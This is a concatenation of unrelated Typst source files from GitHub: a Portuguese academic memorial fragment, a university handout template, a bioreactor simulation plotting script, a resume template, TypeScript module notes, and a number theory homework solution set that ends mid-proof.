Pesquisa por dois mandatos, e finalmente, representei os alunos da genética na Comissão Coordenadora de Programa (CCP) do Programa de Pós-Graduação em Ciências Biológicas (Biologia Genética) por 2 mandatos, ficando como representante até o último mês do meu doutorado. Durante essa trajetória nas comissões, começando na Congregação e descendo a hierarquia de comissões que regem a pós-graduação até a CCP, procurei adotar uma participação construtiva e propositiva que contribuísse para a formação dos alunos, atuando como uma ponte entre seus interesses e necessidades e a realidade do instituto. Assim, ao longo da minha jornada como representante discente e minha atuação nas diversas comissões do Instituto de Biociências, adquiri uma compreensão profunda da dinâmica universitária e do papel crucial que a representação discente desempenha nesse contexto. Minha motivação inicial, que surgiu da necessidade pragmática de alguém para ocupar essa função, se transformou em um desejo genuíno de contribuir para o funcionamento do instituto. Hoje, ao me candidatar a essa posição, trago não apenas o conhecimento acadêmico e a experiência de pesquisa, mas também uma visão enriquecida pelas vivências nas comissões, onde observei a interação entre alunos, docentes e a administração acadêmica. Estou comprometido em continuar contribuindo com a formação de alunos e com o funcionamento da administração universitária, agora não apenas como representante discente, mas como um educador empenhado em moldar a trajetória dos futuros profissionais e pesquisadores.
#set par(
leading: 0.65em,
first-line-indent: 0em,
justify: false
)
#bibliography("memorial.bib",
style: "apa",
title: "Referências")
|
|
https://github.com/MichaelFraiman/TAU_template | https://raw.githubusercontent.com/MichaelFraiman/TAU_template/main/mfraiman-TAU-TA.typ | typst | // **** imports ****
// boxes
#import "mfraiman-boxes.typ" as box
// problem setup
#import "mfraiman-problem.typ" as problem
// theorems setup
#import "mfraiman-theorem.typ" as th
// lists
#import "mfraiman-lists.typ" as li
// Global parameters for the handout
#let g_les_num = state("LessonNumber", none)
#let g_les_date = state("LessonDate", "00.00.2000")
#let g_les_name = state("LessonName", "Hello World!")
#let g_les_name_header = state("LessonNameHeader", "Hello Header!")
#let g_les_num_symb = state("LessonNumberSymbol", "")
#let g_sol_disp = state("SolutionsDisplay", false)
#let g_answ_disp = state("AnswersDisplay", false)
//counters
#let ProblemNumber = counter("ProblemNumber")
#let InlineCounter = counter("InlineCounter")
#let TheoremCounter = counter("TheoremCounter")
//lengths
#let glob_font_size = 11pt
#let glob_baselineskip = glob_font_size * 1.35 //13.6pt
#let glob_b = glob_font_size * 2 //22pt
#let glob_leading = glob_b - glob_baselineskip
#let glob_rel_leading = 0.65em
#let glob_parskip = glob_leading + glob_baselineskip / 2
//global fonts
#let glob_font_rm = state("FontText", "Meta Serif Pro")
#let glob_font_sf = state("FontHead", "Helvetica Neue Pro")
#let glob_font_tt = state("FontMono", "Pt Mono")
//data loading
#let load_doc_params(
name,
class,
activity_type
) = {
//let full = name + ".json"
let full = name + ".yaml"
//let info_file = json(full)
let info_file = yaml(full)
let date_en = str(info_file.at(class).at(activity_type).date.en)
let date_he = str(info_file.at(class).at(activity_type).date.he)
let date = ""
if date_he == "" {
date = date_en
} else {
//date = date_en + " " + date_he
date = date_he + " " + date_en
}
let link_to_cc = none
if "link" in info_file.at(class).at(activity_type) {
link_to_cc = info_file.at(class).at(activity_type).link
}
let params = (
// general info for the course
// chapter
chapter_en: info_file.general.chapter.en,
chapter_he: info_file.general.chapter.he,
chapter_ar: info_file.general.chapter.ar,
chapter: "" + info_file.general.chapter.en + " " + info_file.general.chapter.he + " " + info_file.general.chapter.ar + "",
// part
part_en: info_file.general.part.en,
part_he: info_file.general.part.he,
part_ar: info_file.general.part.ar,
part: "" + info_file.general.part.en + " " + info_file.general.part.he + " " + info_file.general.part.ar + "",
// course
course_period: info_file.general.course.period,
//
display_sols: info_file.general.activity_types.at(activity_type),
paper: info_file.general.activity_types.at(activity_type).paper,
activity_name: info_file.general.activity_types.at(activity_type).activity_name,
// specific for the class
num: info_file.at(class).num,
name: info_file.at(class).name,
//name_header: info_file.at(class).name_header,
date_en: date_en,
date_he: date_he,
date: date,
num_symb: info_file.at(class).at(activity_type).num_symb,
// footer info
lecturer_name_en: info_file.general.lecturer.name.en,
lecturer_name_he: info_file.general.lecturer.name.he,
lecturer_email: info_file.general.lecturer.email,
lecturer_position_en: info_file.general.lecturer.position.en,
lecturer_position_he: info_file.general.lecturer.position.he,
teacher_position_en: info_file.general.teacher.position.en,
teacher_position_he: info_file.general.teacher.position.he,
teacher_name: info_file.general.teacher.name,
teacher_email: info_file.general.teacher.email,
course_period_word_en: info_file.general.course.period.word.en,
course_period_word_he: info_file.general.course.period.word.he,
course_period_en: info_file.general.course.period.dates.en,
course_period_he: info_file.general.course.period.dates.he,
reception_name_en: info_file.general.teacher.reception.name.en,
reception_name_he: info_file.general.teacher.reception.name.he,
reception_time_en: info_file.general.teacher.reception.time.en,
reception_time_he: info_file.general.teacher.reception.time.he,
pdf_info: info_file.general.teacher.pdf_info,
link_word_en: info_file.general.link.word.en,
link_word_he: info_file.general.link.word.he,
link_to_cc: link_to_cc
)
params
}
// lists
#let enum_l = li.enum_l
#let enum_big = li.enum_big.with(spacing: glob_b)
#let enum_cond = li.enum_cond
#let rr = li.rr.with(InlineCounter)
#let ur = li.ur
#let list_bull = li.list_bull.with(spacing: glob_b * 0.5)
#let enum_col = li.enum_col.with(InlineCounter)
//Problem setup
// needs a fix for g_sol_disp
#let prob = problem.problem.with(
ProblemNumber, //counter used to display problem number (ProblemNumber)
InlineCounter, //InlineCounter
prob_word: "Problem",
prob_punct: ".",
display_answer: context g_answ_disp.get(),
display_solution: context g_sol_disp.get(),
les_num: g_les_num,
les_num_symb: context g_les_num_symb.get(),
)
#let ex = problem.problem.with(
ProblemNumber, //counter used to display problem number (ProblemNumber)
InlineCounter, //InlineCounter
prob_word: "Example",
prob_punct: ".",
display_answer: context g_answ_disp.get(),
display_solution: context g_sol_disp.get(),
les_num: context g_les_num.get(),
les_num_symb: context g_les_num_symb.get(),
)
#let theorem = th.theorem.with(
TheoremCounter,
name: "Theorem",
les_num: context g_les_num.get(),
les_num_symb: context g_les_num_symb.get(),
body_style: "italic",
numbered: true
)
#let definition = th.theorem.with(
TheoremCounter,
name: "Definition",
les_num: context g_les_num.get(),
les_num_symb: context g_les_num_symb.get(),
body_style: "normal",
numbered: true
)
#let remark = th.theorem.with(
TheoremCounter,
name: "Remark",
les_num: context g_les_num.get(),
les_num_symb: context g_les_num_symb.get(),
body_style: "normal",
numbered: false,
name_func: text
)
// default setup
#set math.equation(numbering: "(1)")
//doc style setup
#let conf(
paper: "a4",
head_numbering: "1.1.1",
font_rm: ("Meta Serif Pro", "Noto Serif Hebrew", "Noto Naskh Arabic"),
font_sf: ("Helvetica Neue LT W1G", "Noto Sans Hebrew", "Noto Sans Arabic"),
font_tt: ("Noto Sans Mono", "Helvetica Monospaced W1G", "PT Mono"),
font_math: ("STIX Two Math", "STIX Math"),
font_header: ("Helvetica Neue LT W1G", "Noto Sans Hebrew", "Noto Sans Arabic"),
font_footer: ("Helvetica Neue LT W1G", "Noto Sans Hebrew", "Noto Sans Arabic"),
lang: "en",
num: 0,
date: "00.00.0000",
disp: true,
name: "<NAME>!",
name_header: "Hello World!",
num_symb: "",
part: "Tel Aviv University",
chapter: "Subject",
//
info_file: "info",
class_id: "00",
activity: "Plan",
//
doc
) = {
let params = load_doc_params(info_file, class_id, activity)
let paper = params.paper
let num = params.num
let num_symb = params.num_symb
let date = params.date
let disp = params.display_sols
let name = params.name
let name_header = params.name + ". " + params.activity_name
let chapter = params.chapter
let part = params.part
let w_foot_b = "regular"
let w_foot_l = "extralight"
let w_foot_th = "thin"
let w_foot_eb = "bold"
let w_head_b = "medium"
let w_head_l = "light"
let n_top_above = 1.5 //number of lines above the header
let n_top_below = 1 // same, but below the header
let header_font_size = 0.9em
let n_bottom_above = 1
let n_bottom_below = 1
let footer_font_size = 0.75em
let n_header_height = 2
let n_footer_height = 4
//how many lines fit in the paper (REQUIRES A FIX)
let baselines_num = calc.floor(297mm / glob_baselineskip)
let paper_excess = 297mm - baselines_num * glob_baselineskip
let page_num_display(
page: 0,
total: 0,
lang: "en",
weight_page: "bold",
weight_words: "light"
) = {
if lang == "he" {
text(weight: weight_words)[עמוד]
[ ]
str(page)
text(weight: weight_words)[ מתוך ]
str(total)
} else {
text(weight: weight_words)[Page ]
str(page)
text(weight: weight_words)[ of ]
str(total)
}
}
set page(
paper: paper,
columns: 1,
margin: (
left: 2*glob_baselineskip,
right: 2*glob_baselineskip,
top: ( n_top_above + n_header_height + n_top_below ) * glob_baselineskip,
bottom: (n_bottom_above + n_footer_height + n_bottom_below) * glob_baselineskip + paper_excess - 1mm
// -1 mm is a fix, because otherwise the last line in the text doesn't fit
),
header-ascent: 0%,
header: context {
rect(
inset: 0pt,
outset: 0pt,
height: 2 * glob_baselineskip,
width: 100%,
stroke: 0mm
)[#{
set text(
stretch: 50%,
font: font_header,
size: header_font_size,
weight: w_head_b,
historical-ligatures: false,
discretionary-ligatures: false
)
set par(leading: glob_rel_leading*0.5)
if text.lang == "he" {
params.chapter_he + " " + params.chapter_ar + " " + params.chapter_en
h(1fr)
"" + params.date_en + " " + params.date_he
linebreak()
text(
weight: w_head_l
)[#{
params.part_he + " " + params.part_ar + " " + params.part_en
h(1fr)
if num != none {
"" + str(num) + str(num_symb) + [. ]
name_header
} else {
name_header
}
//part + h(1fr) + str(num) + str(num_symb) + [. ] + name_header
}]
} else {
chapter + h(1fr) + date
linebreak()
text(
weight: w_head_l
)[#{
if num != none {
part + h(1fr) + str(num) + str(num_symb) + [. ] + name_header
} else {
part + h(1fr) + name_header
}
}]
}
}]
v(glob_b - glob_baselineskip + n_top_below * glob_baselineskip)
},
footer: {
v(n_bottom_above * glob_baselineskip)
rect(
inset: 0pt,
outset: 0pt,
height: 3 * glob_baselineskip,
width: 100%,
stroke: 0.0mm
)[#{
v(glob_b - glob_baselineskip)
set text(
stretch: 50%,
font: font_footer,
size: footer_font_size,
weight: w_foot_b,
historical-ligatures: false,
discretionary-ligatures: false,
dir: ltr
)
set par(leading: glob_rel_leading*0.45)
params.lecturer_position_en
[: ]
text(weight: w_foot_l)[#params.lecturer_name_en ]
link("mailto:" + params.lecturer_email)[
#text(font: font_tt, weight: w_foot_l)[#params.lecturer_email]
]
h(1fr)
text(weight: w_foot_l)[#params.lecturer_name_he ]
[] + params.lecturer_position_he + [: ]
linebreak()
params.teacher_position_en
[: ]
text(weight: w_foot_l)[#params.teacher_name.en ]
link("mailto:" + params.teacher_email)[
#text(font: font_tt, weight: w_foot_l)[#params.teacher_email]
]
h(1fr)
text(weight: w_foot_l)[#params.teacher_name.he ]
[] + params.teacher_position_he + [: ]
linebreak()
params.reception_name_en + [: ]
text(weight: w_foot_l)[#params.reception_time_en]
h(1fr)
text(weight: w_foot_l)[#params.reception_time_he]
[] + params.reception_name_he + [: ]
linebreak()
params.course_period_word_en + [: ]
text(weight: w_foot_l)[#params.course_period_en]
h(1fr)
text(weight: w_foot_l)[#params.course_period_he]
[] + params.course_period_word_he + [: ]
if params.link_to_cc != none {
linebreak()
params.link_word_en + [: ]
link("https://" + params.link_to_cc)[
#text(font: font_tt, weight: w_foot_l)[#params.link_to_cc]
]
h(1fr)
text(weight: w_foot_l)[#sym.arrow.l.filled]
[] + params.link_word_he + [: ]
}
linebreak()
text(
weight: w_foot_th,
font: font_sf,
stretch: 50%,
size: 0.8em
)[#params.pdf_info]
h(1fr)
text(
stretch: 100%,
weight: w_foot_eb
)[#{
context {
page_num_display(
page: counter(page).display(),
total: counter(page).final().first(),
lang: lang,
weight_page: w_foot_eb,
weight_words: w_foot_l
)
}
}]
}]
v(n_bottom_below * glob_baselineskip)
},
footer-descent: 0%
)
set text(
font: font_rm,
lang: lang,
size: glob_font_size,
number-type: "lining",
number-width: "tabular",
top-edge: "cap-height",
bottom-edge: "baseline",
//features: ("calt", "case", "salt"),
//discretionary-ligatures: true,
historical-ligatures: true,
fractions: false,
)
set par(
justify: true,
linebreaks: "optimized",
leading: glob_rel_leading
)
show par: set block(
spacing: glob_parskip
)
set outline(
indent: true,
depth: 4
)
show heading.where(
level: 1
): it => block(
width: 100%,
above: glob_b,
below: glob_b,
)[#{
set text(
22pt,
weight: 900,
font: font_sf,
stretch: 100%
)
context {
if g_les_num.get() != none {
str(g_les_num.get())
str(g_les_num_symb.get())
[. ]
}
}
smallcaps(it.body)
}]
show heading.where(
level: 2
): { it => block(
width: 100%,
below: glob_b,
above: glob_b
)[#{
set text(
16pt,
weight: 700,
font: font_sf
)
[§ ]
smallcaps(it.body)
}] }
show math.equation: set text(
font: font_math,
size: 1.05em
)
//show "LHS": smallcaps
set enum(
numbering: {
(..nums) => {
if nums.pos().len() == 1 {
set text(weight: "extrabold")
"("
nums.pos().map(str).first()
")"
} else {
"("
set text(weight: "bold")
nums.pos().map(str).first()
"."
set text(weight: "medium")
nums.pos().slice(1).map(str).join(".")
")"
}
}
},
full: true,
indent: 0.5em,
number-align: start + top,
spacing: glob_b * 0.5,
tight: false
)
set math.equation(
numbering: {
(..nums) => {
set text(
weight: "light",
font: font_rm,
style: "normal",
stretch: 100%,
ligatures: false,
)
"("
context{
if g_les_num.get() != none {
str(g_les_num.get())
g_les_num_symb.get()
[.]
}
}
{
set text(
weight: "regular"
)
numbering("א", nums.pos().first())
}
")"
}
}
)
set figure(
numbering: {
(..nums) => {
set text(
weight: "regular",
font: font_rm,
style: "normal",
stretch: 100%,
ligatures: false,
)
context{
if g_les_num.get() != none {
str(g_les_num.get())
g_les_num_symb.get()
[.]
}
}
numbering("1", nums.pos().first())
}
}
)
show figure.caption: set text(size: 0.7em)
//show "ODE": smallcaps[ode]
//show regex("DE"): smallcaps[de]
//show "LHS": smallcaps[lhs]
//show "RHS": smallcaps[rhs]
g_sol_disp.update(disp)
g_les_num.update(num)
g_les_num_symb.update(num_symb)
glob_font_rm.update(font_rm)
glob_font_sf.update(font_sf)
glob_font_tt.update(font_tt)
doc
}
#let important(title, body) = {
context {
box.slantedColorbox(
title: title,
col_back: rgb(230, 232, 244),
col_stroke: rgb(9, 31, 146),//navy,
col_title: rgb(9, 31, 146),
col_text_title: white,
col_text_body: black,
font_body: glob_font_rm.get(),
font_title: glob_font_sf.get(),
font_emoji: "Noto Emoji",
emoji: emoji.finger.r,
radius: 0pt,
width: auto,
body
)
}
}
#let attention(title, body) = {
context {
box.slantedColorbox(
title: title,
col_back: rgb(255,230,234),
col_stroke: rgb(153,0,26),
col_title: rgb(153,0,26),
col_text_title: white,
col_text_body: black,
font_body: glob_font_rm.get(),
font_title: glob_font_sf.get(),
font_emoji: "Noto Emoji",
emoji: emoji.siren,
radius: 0pt,
width: auto,
body
)
}
}
#let footnote_dict(
term,
def,
// alternative spelling
alt: none,
// part of speech
pos: none,
// note such as obsolete, slang etc
note: none,
// pronunciation
pro: none
) = {
footnote({
context {
text(font: glob_font_sf.get(), weight: 700)[#smallcaps(term)]
if alt != none {
text(font: glob_font_sf.get(), style: "italic", weight: 300, size: 0.9em)[ or]
text(font: glob_font_sf.get(), weight: 700)[ #smallcaps(alt)]
}
if pro != none { text(font: "Doulos SIL", fallback: false)[ /#sym.space.thin#pro#sym.space.thin/] }
if pos != none { text(font: glob_font_sf.get(), style: "italic", weight: 300, size: 0.9em)[ #pos] }
if note != none { text(font: glob_font_sf.get(), style: "italic", weight: 300, size: 0.9em)[ (#note)] }
[ ] + def
}
})
}
//logical break
#let br_log() = {
block(
width: 100%,
height: glob_baselineskip,
//spacing: - 0.5 * glob_baselineskip
)[
#align(
center + horizon,
text(size: 2em)[#sym.ast #sym.ast #sym.ast])
]
}
#let class_optional(body) = {
set text(size: 0.85em)
br_log()
body
br_log()
}
#let acr(text) = {smallcaps[#text]} |
|
https://github.com/Tiggax/zakljucna_naloga | https://raw.githubusercontent.com/Tiggax/zakljucna_naloga/main/src/figures/simulation.typ | typst | #import "../additional.typ": todo
#import "@preview/cetz:0.2.2": canvas, plot, draw, vector
#import "@preview/oxifmt:0.2.1": strfmt
#let get_plot(target) = {
let plots = csv(target + ".csv", row-type: dictionary).map(
((minutes, volume, vcd,glutamin,glucose,DO,c_O2,oxygen,product)) => (
minutes: float(minutes),
volume: float(volume),
vcd: float(vcd),
glutamin: float(glutamin),
glucose: float(glucose),
DO: float(DO),
cO2: float(c_O2),
oxygen: float(oxygen),
product: float(product),
))
canvas(
length: 1cm,
{
plot.plot(
size: (16,10),
legend: "legend.inner-north-west",
x-label: "days",
y-label: "values",
x-format: x => {
let min = x
let days = calc.floor(x / (60 * 24))
[#days]
},
{
plot.add(
label: "volume",
plots.map(x => (x.minutes, x.volume)),
)
plot.add(
label: "VCD",
plots.map(x => (x.minutes, x.vcd)),
)
plot.add(
label: "glutamin",
plots.map(x => (x.minutes, x.glutamin)),
)
plot.add(
label: "glucose",
plots.map(x => (x.minutes, x.glucose)),
)
plot.add(
label: "DO",
plots.map(x => (x.minutes, x.DO)),
)
plot.add(
label: "PID",
plots.map(x => (x.minutes, x.oxygen)),
)
plot.add(
label: "product",
plots.map(x => (x.minutes, x.product)),
)
}
)
}
)
}
#let cnt = 0
#let results(target) = {
return (plot: get_plot(target), const_table: get_table(target))
}
#let line(key, val, depth) ={
let t = "min"
let vals = (
mu_max: $"MVC"/("ml" #t)$,
power_input: $W / m^3$,
ks_glucose: $g/L$,
ks_glutamine: $g/L$,
n_vcd: none,
day: $"day"$,
product: $(m g)/("MVC" #t)$,
k_glucose: $"MVC"/#t$,
k_glutamine: $"MVC"/#t$,
kP: none,
kDO: $"mol"/ L$,
cell_metabolism: $"mol"/("cell" #t)$,
air_flow: $L / #t$,
henry: $"mol" / ("bar" L)$,
minimum: $%$,
fi_oxygen_max: $L / #t$,
max_flow: $L / #t$,
volume: $L$,
vcd: [$(M V C) / (m L)$ #footnote[Million Viable Cells per $m L$]],
glucose: $g/L$,
glutamine: $g/L$,
oxygen_part: $%$,
start: $d a y$,
rate: [$(%"IWV")/"day"$ #footnote[% Initial Working Volume per day]],
)
if type(val) == float {
((
table.cell(key.replace("_", " "),fill: aqua.transparentize(80%)),
table.cell([#val], colspan: depth - 1, align: right ),
table.cell(vals.at(key,default: [TODO: add unit]), inset: .6em)
),)
} else {
let height = val.values().map(x => if type(x) == float {1} else {x.len()}).sum()
(
table.cell(key.replace("_", " "), rowspan: height, fill: aqua.transparentize(60%)),
for ((k,v)) in val {
line(k,v,depth - 1)
}
)
}
}
#let constants(name) = {
let values = json("/data/" + name + ".json")
let a = for ((k,v)) in values {
line(k,v,4)
}
table(
columns: 5 ,
..a.flatten()
)
}
#constants("default")
#let diff(a,b) = {
if type(a) == float {
if a != b {
return a
}
} else {
let out = (:)
for ((k,v)) in a {
let res = diff(v,b.at(k))
if res != none {
out.insert(k, res)
}
}
return if out != (:) { out }
}
}
#let constants_diff(name) = {
let default = json("/data/default.json")
let values = json("/data/" + name + ".json")
let out = (:)
for ((k,v)) in values {
let res = diff(v, default.at(k))
if res != none {
out.insert(k, res)
}
}
let a = for ((k,v)) in out {
line(k,v,4)
}
table(
columns: 5 ,
..a.flatten()
)
} |
|
https://github.com/dark-flames/resume | https://raw.githubusercontent.com/dark-flames/resume/main/resume.typ | typst | MIT License | #import "chicv.typ": *
#import "libs.typ": *
#import "data.typ": *
#let resume(env) = [
#show: chicv
#name(env)
#links(env)
#edu(env)
#interest(env)
#research(env)
#work(env)
#openSource(env)
#project(env)
#if is-cv(env) {
new-page(env)
}
#skill(env)
#award(env)
#pub(env)
]
|
https://github.com/ymgyt/techbook | https://raw.githubusercontent.com/ymgyt/techbook/master/programmings/js/typescript/specification/module.md | markdown | # module
* moduleとは、import or exportを1つ以上含むjs fileのこと
* moduleは常にstrict mode
* 1回目のimportのときだけ評価され、以降はcacheされる
## ES Module
* typescriptではこれ
## CommonJS
```typescript
const pkg1 = require("package1");
```
* serverside(node)で使う場合はこれ
* `require()`を使う
* `.js`,`.ts`を読み込む(`.js`が優先される)
* `node_modules` dir配下に存在する必要がある
* 呼び出し側のfileからみて相対pathで指定する
* directoryを書いた場合その中の`index.{js,ts}`が読み込まれる
### exports
util.js
```typescript
exports.increment = (i) => i + 1;
```
index.js
```typescript
const util = require("./util");
util.increment(1);
// 分割代入もできる
const { increment } = require("./util");
increment(3);
```
|
|
https://github.com/AxiomOfChoices/Typst | https://raw.githubusercontent.com/AxiomOfChoices/Typst/master/Courses/Math%2018_785%20-%20Number%20Theory/Assignments/Assignment%201.typ | typst | #import "/Templates/generic.typ": latex, header
#import "@preview/ctheorems:1.1.0": *
#import "/Templates/math.typ": *
#import "/Templates/assignment.typ": *
#show: doc => header(title: "Assignment 1", name: "<NAME>", doc)
#show: latex
#show: NumberingAfter
#show: thmrules
#let col(x, clr) = text(fill: clr)[$#x$]
#let pb() = {
pagebreak(weak: true)
}
#set page(numbering: "1")
#let bar(el) = $overline(#el)$
*Sources consulted* \
Classmates: <NAME>, <NAME>, <NAME>. \
Texts: Class Notes, Algebraic Number Theory by Milne, Elementry and Analytic Theory of Algebraic Numbers by Narkiewicz.
= Question
== Statement
Write down a monic polynomial $f in ZZ[x]$ with $sqrt(2) + sqrt(3)$ as a root.
== Solution
The polynomial is
$
f(x) = x^4 - 10x^2 + 1
$
= Question
== Statement
Let $K = QQ(sqrt(d))$ with $d != 0,1$ a square free integer, and let $frak(p)$ be a nonzero prime ideal of the ring of integers $cal(O)_k$ that does not divide $(2d)$.
+ Show that $frak(p)$ can be written in the form $(p, alpha)$, with $(p) = frak(p) sect ZZ$ and $alpha in cal(O)_k$.
+ Show that $cal(O)_k quo frak(p) tilde.eq FF_q$ where $[ cal(O)_k : frak(p) ]$ is either $p$ or $p^2$. Give an explicit criteria in terms of $p$ and $d$ for which case occurs.
== Solution
We know that $frak(p)$ is an integral domain in $K$ which is an extension of an integral domain $frak(p) sect ZZ$. Since $frak(p)$ is prime so it is of the form $(p)$ for some prime $p$.
Now we have the integral extension
$
FF_p tilde.equiv ZZ quo (p) seq cal(O)_k quo frak(p)
$
so $cal(O)_k quo frak(p)$ is an integral extension of a field and thus itself a field. But now we know that
$
cal(O)_k = cases(ZZ[sqrt(d)] : d = 2\,3 mod 4, ZZ[(1+sqrt(d))/2] : d = 1 mod 4).
$
We check the two cases separately, if $d = 2,3 mod 4$ then $cal(O)_k = ZZ[x] quo (x^2-d)$ and so
$
cal(O)_k quo (p) iso ZZ[x] quo (x^2 - d, p) iso FF_p [x] quo (x^2 - d)
$
Now if $d$ is not a square in $FF_p$ then this polynomial does not split and so $cal(O)_k quo (p)$ is a field and thus $(p)$ is maximal hence $(p) = frak(p)$ so choosing $alpha = p$ makes $(p, alpha) = (p) = frak(p)$. If $d$ is a square then $x^2 - d$ factors as $(x-sqrt(d))(x+sqrt(d))$ and thus we get
$
cal(O)_k quo (p) iso FF_p times FF_p.
$
In this case we pick $alpha$ to be any representative of $(0,1)$ or $(0,1)$ in $cal(O)_k quo (p)$ and then get $cal(O)_k quo (p,alpha)$ is a maximal ideal hence prime.
On the other hand if $d = 1 mod 4$ then $cal(O)_k = ZZ[x] quo (x^2 - x + (1 - d)/4)$, so we do a similar calculation
$
cal(O)_k quo (p) iso ZZ[x] quo (x^2 - x + (1-d) / 4, p)
iso FF_p [x] quo (x^2 - x + (1-d) / 4)
$
Now again if $d$ is a square $mod p$ then this polynomial factors as
$
(x-(1+sqrt(d)) / 2)(x-(1-sqrt(d)) / 2)
$
and if not then we get a field, and the exact same reasoning follows in both cases. We thus get a solution to both parts of the question, in the case where $d$ is not a square in $FF_p$ we pick $alpha = p$ and get $cal(O)_k quo frak(p) iso FF_(p^2)$. In the case where $d = n^2 mod p$ we have $cal(O)_k quo (p) = FF_p times FF_p$ and picking $alpha$ to be a representative of $(0,1)$ we get $cal(O)_k quo (p, alpha) = FF_p$.
= Question
== Statement
Let $K = QQ(zeta_5)$ be the number field generated by a primitive 5th root of unity $zeta_5$. Show that $K times.circle_QQ RR$ is isomorphic to $RR^4$ as an $RR$-vector space but not as an $RR$-algebra.
== Solution
Clearly $1 times.circle 1, zeta_5 times.circle 1, zeta_5^2 times.circle 1, zeta_5^3 times.circle 1$ form a basis for $K times.circle_QQ RR$ as an $RR$-vector space, so it is isomorphic to $RR^4$. Now consider the action of an element in $(a,b,c,d) in RR^4$ on $RR^4$, it is not possible that $(a,b,c,d)$ has an order of $5$ because that would mean $a^5 = b^5 = c^5 = d^5 = 1$ and that would imply that $a = b = c = d = 1$ making it order $1$. However, $zeta_5$ does have an order of $5$ as an action on $K times.circle_QQ RR$, so the two algebras cannot be isomorphic.
= Question
== Statement
Show that the ring $A = ZZ[sqrt(2)]$ is euclidean.
== Solution
We define the norm $abs(a + b sqrt(2)) = abs(a^2 - 2b^2)$, let us check that it is multiplicative.
$
abs((a + b sqrt(2))(c + d sqrt(2)))
&= abs(a c + 2 b d + (a d + b c) sqrt(2))
\ &= (a c + 2 b d)^2 - 2(a d + b c)^2
\ &= a^2 c^2 + 4 a b c d + 4 b^2 d^2 - 2 a^2 d^2 - 4a b c d - 2 b^2 c^2
\ &= a^2 c^2 + 4 b^2 d^2 - 2 a^2 d^2 - 2 b^2 c^2
$
and
$
abs(a+b sqrt(2)) abs(c + d sqrt(2))
= (a^2 - 2b^2)(c^2 - 2d^2)
= a^2 c^2 - 2b^2 c^2 - 2a^2d^2 + 4b^2 d^2
$
We check now that it is a euclidean norm, assume we are given $x,y in ZZ[sqrt(2)]$ and set $z = x/y in QQ(sqrt(2))$. We write $z = a + b sqrt(2)$ for $a,b in QQ$, then round $a,b$ to the nearest integers to get $n,m$, we then have
$
abs((n + m sqrt(2)) - (a + b sqrt(2)))
&= abs((n - a) + (m - b)sqrt(2))
\ &= abs((n-a)^2 - 2(m - b)^2)
\ &<= abs(n-a)^2 + 2 abs(m - b)^2
\ &<= 1 / 4 + 2 / 4 = 3 / 4
$
Now set $q = n + m sqrt(2)$ and compute
$
abs(x - q y) = abs(y(x/y- q)) = abs(y) abs(x/y - q) = abs(y) abs(z - q) <= 3 / 4 abs(y)
$
so indeed this norm is euclidean.
= Question
== Statement
Show that the units of $A = ZZ[sqrt(2)]$ are given by $plus.minus (1 + sqrt(2))^n, n in ZZ$.
== Solution
We use again the norm we had before and note that if $a + b sqrt(2)$ is a unit then it must have norm 1. Now solving for that we get
$
a^2 - 2b^2 = plus.minus 1
$
which we need to analyze the solutions of. We will do this by an infinite descent method, it is clear that for $a = 1$ the only solutions are $b=-1,0,1$, so we assume that $abs(a) > 1$. We can also assume WLOG that $a$ and $b$ are positive, as otherwise we can replace them with the conjugate to force that to be the case. We now multiply $a + b sqrt(2)$ by $1 - sqrt(2)$, expanding this we get
$
(a + b sqrt(2)) (1 - sqrt(2)) = (a - 2b) + (b - a) sqrt(2).
$
We now claim that $abs(a - 2b) < abs(a)$, if this is not the case then we must have $abs(b) >= abs(a)$, but since $a^2 - 2b^2 = plus.minus 1$ then
$
a^2 + 1 >= 2 b^2 >= 2 a^2
$
which is not possible if $abs(a) > 1$. We thus have that after this multiplication $abs(a)$ became strictly smaller, so we can repeat this until we get $abs(a) = 1$. Thus we get
$
(a+b sqrt(2)) (1 - sqrt(2))^n = -1,1
$
which when rearranged proves exactly the result.
= Question
== Statement
Show that the discriminant $Delta_k$ of a number field $K$ is always $0,1 mod 4$.
== Solution
We know that $Delta_k$ can be written as $det (rho_i alpha_j)^2$ where $rho_i$ are embeddings of $K$ into $CC$. Now a determinant can be written as a sum
$
det (rho_i alpha_j)
= sum_(sigma in S_n) op("sgn")(sigma) product_(i=1)^n rho_i alpha_(sigma(j))
$
now we can split this sum into the even positive terms and negative terms, we call $A$ the sum of positive terms and $-B$ the sum of negative terms. Then we can write
$
Delta_k = (A-B)^2 = (A + B)^2 - 4 A B
$
Now the action of an element $phi$ in the Galois group permutes the $rho_i$'s either in an even or odd fashion, if it is even then it fixes $A$ and $B$, otherwise it swaps them. Either way $A + B$ and $A B$ are fixed. Now $A + B$ is then fixed by the Galois group and is thus a rational number, but it is also by a sum of integral elements and thus integral, so we know it is an integer, similarly for $A B$. We thus have that $Delta_k mod 4 = (A + B)^2 mod 4 = 0,1 mod 4$.
= Question
== Statement
Show that the ideals in the ring $ZZ[sqrt(-3)]$ do not necessarily factor uniquely into products of prime ideals.
== Solution
Consider the ideal $(2, 1 + sqrt(-3))$, we have
$
(2, 1 + sqrt(-3)) (2,1 + sqrt(-3))
&= (4,2+2sqrt(-3),-2+2sqrt(-3))
= (4, 2 + 2 sqrt(-3))
\ &= (2)(2, 1 + sqrt(-3)).
$
Thus if both $(2, 1 + sqrt(-3))$ and $(2)$ are uniquely factored into prime ideals then $(2, 1 + sqrt(-3))^2$ definitely cannot be.
= Question
== Statement
Let $K = QQ(2^(1 slash 3))$. Show that $O_K$ is monogenic (with generator $theta = 2^(1/3)$).
== Solution
#let al = $2^(1 slash 3)$
#let al2 = $2^(2 slash 3)$
First we compute the discriminant, it turns out to be
$
det mat(3,0,0;0,0,6;0,6,0) = - 108.
$
Now assume that $2 divides [ O_K : ZZ[2^(1 slash 3)]]$, then we have
$
(a_0 + a_1 al + a_2 al2) / 2 in O_K
$
for some $a_0, a_1, a_2$ of which at least one does not divide 2, if it is $a_0$ then we have
$
al2 (a_0 + a_1 al + a_2 al2) / 2 = a_0 / 2 al2 + (a_1 + a_2 al)
$
so we have $a_0 al2 / 2 in O_K$. If it is instead $a_1$ or $a_2$ that does not divide $2$ then a similar calculation shows that $a_1 al2 / 2$ or $a_2 al2 / 2$ are in $O_K$, we shall assume WLOG it is $a_0$. We thus have
$
8 N_(K quo QQ) (a_0 al2 / 2) = N_(K quo QQ) (a_0 al2) = a_0^3 N_(K quo QQ) (
al
)^2
$
But we know that $N_(K quo QQ) (al)$ is equal (up to a sign) to the constant term in the minimal polynomial of $al$ which is $2$. So we get
$
2 N_(K quo QQ) (a_0 al2 / 2) = a_0^3
$
